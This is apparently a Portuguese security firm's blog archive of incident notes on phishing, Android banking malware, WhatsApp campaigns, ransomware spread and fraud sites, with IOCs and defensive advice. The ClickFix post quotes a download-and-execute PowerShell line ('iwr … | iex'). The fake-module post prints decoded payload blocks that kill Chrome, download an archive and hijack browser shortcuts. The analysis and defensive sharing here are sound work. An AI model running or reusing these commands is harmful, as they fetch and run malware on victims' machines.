Tag: Fraude

Vol. 1 No. 20251113-1013 (2025)

Cadeia de suprimentos monitorada?

João Fuzinelli | joao@cylo.com.br | 13/11/2025

Peguei um caso em que duas pessoas da equipe financeira receberam um e-mail que se passava pelo CEO da empresa. A mensagem autorizava um pagamento de R$ 28.900,00 pelos serviços prestados. A equipe rapidamente identificou que se tratava de uma fraude e reportou o incidente para a área de cibersegurança. Ainda bem!

O atacante criou uma conta @outlook.com utilizando o nome do CEO, tentando conferir legitimidade ao envio (ex.: abc.xyz@outlook.com).

Além disso, ele alterou o campo Display Name da mensagem para o nome completo do executivo e criou uma assinatura com o logo da empresa.

No corpo do e-mail, o fraudador enviava uma chave Pix para a realização do pagamento, sendo essa chave o próprio CNPJ da empresa recebedora.

Até aí tudo comum em um ataque de phishing…

Por curiosidade, busquei informações sobre a empresa fraudadora e, por meio do CNPJ, cheguei até o proprietário. A empresa estava localizada em Arapongas – PR.

Ao analisar o histórico profissional do dono da empresa, encontrei um dado relevante: em 2023, o fraudador havia trabalhado em uma empresa prestadora de serviços para a companhia que agora estava sendo alvo.

Como o ataque foi direcionado, com conhecimento dos e-mails e dos nomes específicos envolvidos no processo de pagamentos, é bem provável que o atacante tenha se apropriado de alguma base contendo dados dos clientes do seu emprego anterior e, agora, estivesse aplicando golpes.

Infelizmente, trata-se de mais um caso típico de falhas de controle em múltiplos processos. A superfície de risco só cresce quando a cadeia de suprimentos não é monitorada de ponta a ponta.

Vol. 1 No. 20251110-1004 (2025)

Novo Malware Bancário – “Herodotus”

João Paulo Gonsales | jgonsales@cylo.com.br | 10/11/2025

Recentemente tivemos uma rápida disseminação do malware “Sorvepotel”, e agora novamente, nos deparamos com a notícia que me deixou preocupado, noticia está sobre um novo malware bancário chamado “Herodotus” e que vem atacando muitos usuários Android.

O novo malware se utiliza como principal estratégica de propagação através de campanhas de phishing por SMS, onde usuários recebem links fraudulentos que levam a páginas maliciosas onde o malware é baixado e instalado no seu dispositivo mobile. Após instalado, o malware obtém permissões críticas do sistema e utilizando de táticas sofisticadas como sobreposição de tela para roubar credenciais e tornando as sessões legitimas, dificultando a ação dos antivírus tradicionais ou mesmo não detectando o comprometimento do dispositivo.

Precisamos ficar atentos e reforçar a vigilância no mundo digital e começar a nos precaver com medidas de segurança como, baixar aplicativos somente de lojas oficiais(apesar de não ser 100% a prova de falha, ainda é a opção mais segura), suspeitar de SMS com links e fontes desconhecidas, não validar informações pelo SMS, onde mensagens podem ser interceptadas e alteradas, utilizar se de aplicativos autenticadores como Google ou Microsoft Authenticator, não autorizar permissões críticas no seu dispositivos a aplicativos suspeitos .

Precisamos ficar constantemente atentos, pois a sofisticação dos atacantes está sempre um passo à frente. Segurança não é somente ferramental, mas sim um processo.

Mais informações nos links :

https://www[.]cybersecbrazil.com.br/post/novo-malware-para-android-imita-digita%C3%A7%C3%A3o-humana-para-evitar-detec%C3%A7%C3%A3o-e-roubar-dinheiro

https://www[.]cisoadvisor.com.br/novo-malware-bancario-ataca-usuarios-android/?utm_campaign=&utm_medium=email&utm_source=newsletter

Vol. 1 No. 20251003-973 (2025)

Ataques destinados ao Brasil via Whatsapp

Pedro Brandt Zanqueta | pedro@cylo.com.br | 03/10/2025

Estamos lidando massivamente com a resposta a incidente que vem ocorrendo nessa semana. O ataque inicia via Whatsapp, aplicativo muito utilizado no nosso país.

O objetivo é notificar a todos desse ataque, onde se inicia a partir de arquivo ZIP compartilhado pelo mensageiro, sugerindo o usuário baixar em sua estação e descompactar para execução dos arquivos relacionados e posteriormente iniciar sua exploração.

Sempre desconfie e análise com cautela das informações ao qual recebe e envia, duvide de arquivos, mensagens, promoções e qualquer outra categoria de mensagem.

Recomendações:

  • Controlar aplicações não corporativas no ambiente;
  • Implantar XDR no ambiente para análise comportamental;
  • Integração de feeds de inteligência;
  • Treinamentos no ambiente corporativo;
  • Divulgação de comunicados internos;

IOCs

sorvetenopote[.]com
expansiveuser[.]com
zapgrande[.]com
imobiliariaricardoparanhos[.]com
886136adfac9287ecb53f45d8b5ab42e98d2c8c058288e81795caa13dbf5faa8
94411cd5eb27b28b0b039ac07eef2ec0f4e0e0ebd83884bfcaf79665d73d0b6a
109[.]176[.]30[.]141
23[.]227[.]203[.]148

Exemplo da mensagem que o pessoal recebe:

Vol. 1 No. 20250725-792 (2025)

Um clique, um comando, uma brecha

Yuri Augusto | yuri@cylo.com.br | 25/07/2025

Como já é de conhecimento geral, o elo mais fraco em um ataque é a interferência humana, seja em caso de falhas (bugs), phishing ou engenharia social.
Em um caso recente, o usuário tentou executar um arquivo malicioso e teve a ação bloqueada. Ao verificar o hash do arquivo suspeito (localizado em uma pasta temporária) no Virus Total, o arquivo foi identificado como Powershell.
Em seguida, busquei por comandos que pudessem ter sido executados anteriormente para gerar esse arquivo na pasta temporária. Nem sempre é possível recuperar o histórico de comandos do Powershell, mas neste caso encontrei o seguinte registro no arquivo ConsoleHost_history.txt, localizado em AppData:

iwr walkin[.]college/trace.mp3 | iex # You're Human

Além disso, identifiquei também comandos altamente ofuscados executados pelo .NET . Nesse ponto, já era evidente que se tratava de um ataque de engenharia social relativamente novo: o ClearFake/ClickFix. Nesse tipo de ataque, o usuário acessa um site e é induzido a abrir o menu “Executar” do Windows, colar um código e pressionar Enter. Trata-se, basicamente, de uma variação de phishing com o uso de captcha para dar aparência de legitimidade.

Exemplo de como é realizado o ataque.

Apesar de relativamente recente, esse tipo de ataque já vem sendo amplamente utilizado por diversas famílias de malware.

Gráfico das infecções semanais em 2025.

O sucesso desse ataque se deve à sua simplicidade. O usuário é induzido a digitar, por conta própria, o código malicioso, facilitando o ponto de entrada na estação. A partir daí, o código é executado e inicia-se o download de arquivos maliciosos.
Realizei uma busca na internet e encontrei o script utilizado, bem como a metodologia do ataque. Há indícios de que o malware pertença à família Lumma Stealer.

Algumas maneiras de detectar a atividade maliciosa:

  • Eventos de segurança – eventID 4668 (process creation): procurar instâncias do powershell.exe que tenha explorer.exe como processo pai e que apresente associação com o EventID 4663 (object access) envolvendo arquivos na pasta %LocalAppData%\Microsoft\Windows\WinX\
  • Padrões de uso de shell: identificar sessões elevadas de powershell com comunicações suspeitas ou criação de processos incomuns, como certutil.exe, mshta.exe ou rundll32.exe.

Algumas maneiras para dificultar o roubo de credenciais:

  • Habilitar autenticação multifator (MFA).
  • Adotar métodos de autenticação resistentes à phishing, como FIDO, passkey, e evitar métodos de autenticação SMS.
  • Utilizar AppLocker para restringir aplicações não autorizadas no ambiente.
  • Desabilitar powershell para usuários que não possuem privilégios administrativos.

Felizmente o ataque não chegou a esse ponto, pois foi barrado pelo XDR. No entanto, isso nos alerta para uma das estratégias mais básicas, treinar os usuários, que são os principais alvos dos atacantes. Não se espera que o usuário entenda códigos ou saiba reconhecer ataques, porém, com orientações básicas é possível evitar problemas significativamente mais graves.

Indicators of compromise:
SHA256 – 45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d
Domínio – walkin[.]college/trace.mp3

Mais informações do indicador:
https://www.virustotal.com/gui/file/45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d
https://hybrid-analysis.com/sample/45fb3902a652c7f083bd3f090bf1a0d9ee3b0503256da6cbbce5a8fcaacc7b0d/6882e7fcd6da29a55105d6ab

Referências:
https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/

Vol. 1 No. 20250612-636 (2025)

Como o Ransomware se Espalha Dentro da Sua Rede

Pedro Brandt Zanqueta | pedro@cylo.com.br | 12/06/2025

Ajudando em uma resposta a incidente, recentemente tivemos que lidar com um determinado grupo de ransomware que atrapalhou uma empresa por um período. Com isso decidi detalhar como geralmente um ataque ocorre.

Ponto de partida

Imagine uma manhã comum na sua empresa. Os colaboradores chegam e iniciam suas atividades. Tudo parece normal até que, um e-mail aparentemente inofensivo chega à caixa de entrada de um colaborador do setor financeiro. O assunto é: “Nota Fiscal em Atraso – URGENTE”. Sem nem desconfiar, o funcionário clica no anexo.

O anexo executa um script em PowerShell, que baixa e executa um payload malicioso. Em segundos, o atacante já acesso à rede. Mas o objetivo não é apenas comprometer uma máquina é paralisar a empresa inteira. E para isso, o ransomware precisa se espalhar.

Descoberta do ambiente

Antes de se mover, o atacante precisa entender o ambiente. Ele começa com técnicas de reconhecimento interno. Utiliza comandos para descobrir sistemas remotos, identificar conexões de rede, e localizar compartilhamentos acessíveis.

Com essas informações em mãos, o atacante sabe exatamente onde estão os servidores de arquivos, os controladores de domínio e as estações mais críticas.

Movimentação lateral

Para se mover lateralmente, o atacante precisa de credenciais. Com Mimikatz usa para extrair senhas da memória do processo LSASS. Se tiver sorte, encontra credenciais de administradores de domínio. Caso contrário, ele pode recorrer a ataques de força bruta ou password spray para comprometer outras contas.

Usando ferramentas como PsExec ou WMI, o ransomware começa a se espalhar. Ele cópia seus arquivos para máquinas remotas usando compartilhamentos administrativos e executa o payload silenciosamente.

Se encontrar vulnerabilidades conhecidas, como EternalBlue, ele pode explorá-las diretamente, sem depender de credenciais.

Garantindo a Persistência

Para garantir que o ransomware continue ativo mesmo após reinicializações, o atacante cria tarefas agendadas ou serviços maliciosos.

Processo Final

Quando o atacante sente que já comprometeu o suficiente, ele inicia a fase final: a criptografia. Utilizando algoritmos robustos, o ransomware bloqueia arquivos em servidores, estações de trabalho e até backups conectados.

Em minutos, a empresa inteira está paralisada. Um aviso aparece nas telas: “Seus arquivos foram criptografados. Pague em Bitcoin para recuperá-los.”

Melhorias no ambiente

  • Segmentação de rede: impede que o atacante se mova livremente.
  • Monitoramento de credenciais: detecta uso anômalo de contas.
  • Atualizações regulares: fecham portas exploradas por vulnerabilidades.
  • Treinamento de usuários: reduz o risco de phishing.
  • Soluções de segurança avançadas: como EDRs e SIEMs, ajudam a detectar e responder rapidamente.

Conclusão

O ransomware não é apenas um vírus que aparece do nada. Ele é o resultado de uma cadeia de ações cuidadosamente planejadas.

A pergunta não é se sua empresa será alvo, mas quando. E quando isso acontecer, o quão preparado você estará?

Vol. 1 No. 20250415-321 (2025)

Phishing no Imposto de Renda

João Fuzinelli | joao@cylo.com.br | 15/04/2025

Com a chegada da necessidade da declaração brasileira de imposto de renda temos visto o início campanhas de phishing tentando persuadir pessoas físicas a realizarem pagamentos inadequados.

O e-mail leva o usuário para uma página falsa do governo brasileiro solicitando o CPF da pessoa.

Ao inserir os números do CPF o site falso inicia um carregamento como se estivesse fazendo uma busca a Receita Federal brasileira

Em seguida mostra uma p´´agina como se o CPF consultado estivesse devedor e em caso de não pagamento poderia ocasionar uma série de multas

Ao clicar no botão regularizar o site simula que está realizando os cálculos e gera um extrato do que deve ser pago

Ao pedir para gerar a Darf o site traz a data atual para pagamento e um contador regressivo impondo urgência

Até o exato momento 15-04-2025 21:02 o QRCode do pix não carregou e aparentemente os botões estão quebrados

Recomendamos atenção a ataques relacionados ao assunto, bem como tentativas de fraude por telefone

Vol. 1 No. 20250404-122 (2025)

A Armadilha do Módulo Falso

João Fuzinelli | joao@cylo.com.br | 04/04/2025

Nas últimas semanas, deparamo-nos com uma fraude envolvendo uma entidade financeira, que ocorreu da seguinte maneira: por meio de uma ligação telefônica, o fraudador solicitava que a vítima acessasse o site abaixo:

O site entrava em um modo de ‘aguarde’ e, ao examinarmos o código, identificamos o seguinte caminho:

/diagnostico

O site sempre apresentava um erro de validação, pois o fraudador alegava, durante a conversa, que era necessário atualizar o módulo de segurança.

Ao clicar no botão ‘Instalar Módulo Mais Recente’, era iniciado o download de um arquivo .exe, que o navegador marcava como não confiável. Já no botão ‘Copiar Código de Segurança’, era fornecida uma linha de comando codificada em Base64. Ao realizar o decode, obtive o seguinte resultado em alguns blocos:

Força a parada do processo Chrome:

Stop-Process -Name “chrome” -Force

Instala um módigo do 7zip para powershell

If(-not(Get-InstalledModule 7Zip4Powershell -ErrorAction silentlycontinue)){
Install-Module 7Zip4Powershell -Confirm:$False -Force
}

Realiza o download de um arquivo denominado plugin.zip

Invoke-WebRequest “https:/XYZ[.]COM/download?file=plugin[.]zip” -OutFile “$env:APPDATA\plugin.zip”

Coloca o valor da senha em uma variavel para descomprimir o arquivo zip

$Secure_String_Pwd = ConvertTo-SecureString “@Wrs304093” -AsPlainText -Force

Cria um arquivo .lnk na área de trabalho

ForEach ($folder in $special_folders) {
If (([Environment]::GetFolderPath(“$folder”)) -ne “”) {
$path = [Environment]::GetFolderPath(“$folder”)
$shortcut_name = “\Google Chrome.lnk”
If ([System.IO.File]::Exists(“$($path)$($shortcut_name)”)) {
$obj = New-Object -comObject WScript.Shell;
$lnk = $obj.CreateShortcut(“$($path)$($shortcut_name)”);
$lnk.Arguments = “$arg”;
$lnk.Save();
}

Por fim, o site realizava o download do módulo de segurança original e dava continuidade ao processo, simulando uma atualização legítima. Estou monitorando as atividades do nosso servidor infectado para obter mais informações.